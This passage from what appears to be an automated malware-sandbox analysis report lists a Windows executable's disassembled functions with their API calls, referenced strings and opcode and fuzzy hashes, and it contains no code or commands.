                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftollstrlen
                                                                                                                • String ID: find$string
                                                                                                                • API String ID: 2052632373-714750175
                                                                                                                • Opcode ID: 354f5ced3f16ac45f9bfe9f1d436d3e15d3d92f6b98a36ba76be0b5f9c1790d9
                                                                                                                • Instruction ID: 25949ec09fe44b22c2e5c54f30dd98b0d3d22a1de5424eed0d04a7bee1fb0c66
                                                                                                                • Opcode Fuzzy Hash: 354f5ced3f16ac45f9bfe9f1d436d3e15d3d92f6b98a36ba76be0b5f9c1790d9
                                                                                                                • Instruction Fuzzy Hash: 5E41F43550562579DB05BB66DC43FEE76189F06368F200A0FF522761D2EF6C1B8282AE
                                                                                                                Function 004380FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00438104
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 00438141
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol
                                                                                                                • String ID: string$sub
                                                                                                                • API String ID: 386204849-840957247
                                                                                                                • Opcode ID: 6abd88f371b5804018c6640d17cc2162726079331c79b9a5e5c6cd8d70bb7097
                                                                                                                • Instruction ID: 0a84d31eb87c2cf0dfbeca07404b8c80f64030a6b5c9cdc93c6df70cd9cab058
                                                                                                                • Opcode Fuzzy Hash: 6abd88f371b5804018c6640d17cc2162726079331c79b9a5e5c6cd8d70bb7097
                                                                                                                • Instruction Fuzzy Hash: 9C41263190591076CB05BB66DC06FDF76289F86368F24061FF011661D2DF7C174283AE
                                                                                                                Function 004307EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004307F1
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 00430844
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiApplyPatchA), ref: 0043089B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AddressProc__ftollstrlen
                                                                                                                • String ID: MsiApplyPatchA
                                                                                                                • API String ID: 1060375874-3494550721
                                                                                                                • Opcode ID: 430ddd6f83711d950128309da4ab1ff88125b4d333911fcf85fc06e9a8566a08
                                                                                                                • Instruction ID: 3650b06de49e0371e24a52ee1b310ea6181d079255d05b88511ed11ebd425911
                                                                                                                • Opcode Fuzzy Hash: 430ddd6f83711d950128309da4ab1ff88125b4d333911fcf85fc06e9a8566a08
                                                                                                                • Instruction Fuzzy Hash: 3B31F436914214B9EB08F362EC16FDF27289F41328F14011FF501A61C2EF7C5B8182AD
                                                                                                                Function 0042819E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004281A3
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • __ftol.LIBCMT ref: 00428226
                                                                                                                • ShellExecuteA.SHELL32(00000000,explore,00000000,00000002,00000000,00523A30), ref: 0042826C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementExecuteIncrementShell__ftol
                                                                                                                • String ID: explore
                                                                                                                • API String ID: 3873431966-1223399770
                                                                                                                • Opcode ID: bd00ea477b01b95d683aa43f1a2f224e03f1d6069c242f1992e59e042619e2af
                                                                                                                • Instruction ID: abe5bc0a56f320496d7d89a062e45ca6eec03fae51079ef31fbbbf9bac991e33
                                                                                                                • Opcode Fuzzy Hash: bd00ea477b01b95d683aa43f1a2f224e03f1d6069c242f1992e59e042619e2af
                                                                                                                • Instruction Fuzzy Hash: 7E31A376905618BEDB04EBB6D846EEF7B68DF45314F10002FF401A2182EF786B858679
                                                                                                                Function 00440905 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0044090A
                                                                                                                  • Part of subcall function 004194C8: __EH_prolog.LIBCMT ref: 004194CD
                                                                                                                  • Part of subcall function 004194C8: LoadLibraryExA.KERNEL32(WinINet.dll,00000000,00000002,00523A30), ref: 00419513
                                                                                                                  • Part of subcall function 004194C8: FormatMessageA.KERNEL32(00001300,00000000,00002EE0,00000400,?,00000000,00000000,00523A30), ref: 00419538
                                                                                                                  • Part of subcall function 004194C8: LocalFree.KERNEL32(?,?), ref: 00419550
                                                                                                                  • Part of subcall function 004194C8: FreeLibrary.KERNEL32(00000000), ref: 0041955B
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 00417FD8: __EH_prolog.LIBCMT ref: 00417FDD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$FreeLibrary$DecrementFormatInterlockedLoadLocalMessage
                                                                                                                • String ID: Message$Number$Status
                                                                                                                • API String ID: 1938834182-3482011399
                                                                                                                • Opcode ID: 8811a978a070b76f05fee87e4f21c6044bbcea7103bf46db11927d13232daa9b
                                                                                                                • Instruction ID: 9a994f7739760833678aee26aba1a019c7c7f41c86935ee0ce91a999a74bc4b2
                                                                                                                • Opcode Fuzzy Hash: 8811a978a070b76f05fee87e4f21c6044bbcea7103bf46db11927d13232daa9b
                                                                                                                • Instruction Fuzzy Hash: F521B031805528BACB01BBA6CC02FDE3A68AF52328F10059FF415714D2DF7C178687AE
                                                                                                                Function 00424917 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 0042493C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol
                                                                                                                • String ID: Enabled$Text$Visible
                                                                                                                • API String ID: 2123048387-1258828939
                                                                                                                • Opcode ID: d67fd1ab2e22001e29231bb87058fa1e38bd03c7f8eccca9ce09a03a130009bf
                                                                                                                • Instruction ID: 7195619b2e3654ba354e6922707d6a0a44ada4efaa78e5adbad629ea1bfedfff
                                                                                                                • Opcode Fuzzy Hash: d67fd1ab2e22001e29231bb87058fa1e38bd03c7f8eccca9ce09a03a130009bf
                                                                                                                • Instruction Fuzzy Hash: F411E33610692576DA0237A69C03FDF260D9F463A8F14050FF915290E2AF6D639383EE
                                                                                                                Function 004145BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004145C2
                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,000000FF,00000400,?,00000000,00000000,00523A30,?,?,00000000), ref: 004145FB
                                                                                                                • LocalFree.KERNEL32(?,?), ref: 00414625
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FormatFreeH_prologLocalMessage
                                                                                                                • String ID: Unknown error.
                                                                                                                • API String ID: 1380236612-4225751778
                                                                                                                • Opcode ID: 02109e0bec9d850b2004846ae79263ef8337b5883cdba9afc6f5bc6e6f64563a
                                                                                                                • Instruction ID: b2f9e91ba35779c885f8761fedbd08b48a8e4367c680402b3f28deb291a5c119
                                                                                                                • Opcode Fuzzy Hash: 02109e0bec9d850b2004846ae79263ef8337b5883cdba9afc6f5bc6e6f64563a
                                                                                                                • Instruction Fuzzy Hash: 7911827590025AAEDB04EF95DC81EEEBB38FF50759F10402EF502B6191CB785E44CB64
                                                                                                                Function 0040C39D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C412
                                                                                                                • TranslateMessage.USER32(?), ref: 0040C442
                                                                                                                • DispatchMessageA.USER32(?), ref: 0040C44C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 4217535847-3916222277
                                                                                                                • Opcode ID: a921475d4ef06622d89896c9309cf0f9ca651fab3d7c08b897c7fe13daa55a8c
                                                                                                                • Instruction ID: 221f7586b05350e79d6d81648bcd6839419b0a175b5281decc0391173994cc07
                                                                                                                • Opcode Fuzzy Hash: a921475d4ef06622d89896c9309cf0f9ca651fab3d7c08b897c7fe13daa55a8c
                                                                                                                • Instruction Fuzzy Hash: 7E11F8B1A0130DDBEF24CFD0D989BDEBBB9BB40708F108129E541BA2C5D7B994498B54
                                                                                                                Function 004B8583 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,004AF659), ref: 004B8588
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004B8598
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                • Opcode ID: 6a2cfa6aeef1491d55ec309768ecfe3db66066cf24621627ca0a40ef32a6fdd5
                                                                                                                • Instruction ID: a57e73e2bb75307bdcd2e85eb56f4008d7d981af8501584ad9a2421c441afd51
                                                                                                                • Opcode Fuzzy Hash: 6a2cfa6aeef1491d55ec309768ecfe3db66066cf24621627ca0a40ef32a6fdd5
                                                                                                                • Instruction Fuzzy Hash: 82C08CA0382382FADAB02BB29C89B7E220C1B40B83F24007AB599D81D1CE7CC501C03D
                                                                                                                Function 0044820E Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                  • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0044823F
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00448248
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00447B48: __EH_prolog.LIBCMT ref: 00447B4D
                                                                                                                  • Part of subcall function 00447B48: GetDC.USER32(?), ref: 00447B90
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,00000001,?,?,?,?,00000000), ref: 00448309
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00448340
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$RectRedraw$H_prologIncrementInterlockedShowText
                                                                                                                • String ID:
                                                                                                                • API String ID: 878543187-0
                                                                                                                • Opcode ID: 65fe9e1940129650144afb7f3abf200f655a85f99cf88ee5470afe1b125bb1f5
                                                                                                                • Instruction ID: bdf574744a0fd40e12146c129acc06e2f339a664087c471db0752594b5c75de0
                                                                                                                • Opcode Fuzzy Hash: 65fe9e1940129650144afb7f3abf200f655a85f99cf88ee5470afe1b125bb1f5
                                                                                                                • Instruction Fuzzy Hash: AE415F75E00119AFDF05DFA8CD85EEEBBB5FB48304F10416AE901B7285DA75AE01CB94
                                                                                                                Function 0041C97A Relevance: 6.1, APIs: 4, Instructions: 111networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetCanonicalizeUrlA.WININET(00000825,?,00000825,?), ref: 0041C9C4
                                                                                                                • GetLastError.KERNEL32(?,00000825,?), ref: 0041C9CA
                                                                                                                • InternetCanonicalizeUrlA.WININET(00000825,00000000,00000824,?), ref: 0041C9F0
                                                                                                                • InternetCrackUrlA.WININET(?,00000000,?,?), ref: 0041CA16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Canonicalize$CrackErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2691905175-0
                                                                                                                • Opcode ID: 2252c0795c9837b5ead2f32c7931c4325569a2d7cc3db887cb4dc46805a76772
                                                                                                                • Instruction ID: 4d26e904cd6159e36f6c02495d3d9e6b7e103ed7a3b0d0be63ba7845e993edb0
                                                                                                                • Opcode Fuzzy Hash: 2252c0795c9837b5ead2f32c7931c4325569a2d7cc3db887cb4dc46805a76772
                                                                                                                • Instruction Fuzzy Hash: 664133B955024E9BDB12CF54CC80BEB3BA5FF08394F114056E8169B340DA78DDC1CBA9
                                                                                                                Function 004744FF Relevance: 6.1, APIs: 4, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00474504
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,004741D2), ref: 004745D5
                                                                                                                • ExtractIconA.SHELL32(?,?,00000000), ref: 004745ED
                                                                                                                • LoadIconA.USER32(?,00000073), ref: 0047460D
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                  • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologInterlocked$AttributesFileIconIncrement$DecrementErrorExtractLastLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 3135826775-0
                                                                                                                • Opcode ID: 274e1c65db4f00c34f450ac420b781d89e7568184dca888dcb94617926bbfd24
                                                                                                                • Instruction ID: d271e0370d57781416bfa7f4525115f2f2ec44ec13527acb039fee82c2046f9e
                                                                                                                • Opcode Fuzzy Hash: 274e1c65db4f00c34f450ac420b781d89e7568184dca888dcb94617926bbfd24
                                                                                                                • Instruction Fuzzy Hash: 4F31B5B5900604EFCB04EBA5C985EEEB7B8EF14314F10452EF115E3292DB78AA45CB25
                                                                                                                Function 004A0600 Relevance: 6.1, APIs: 4, Instructions: 93stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
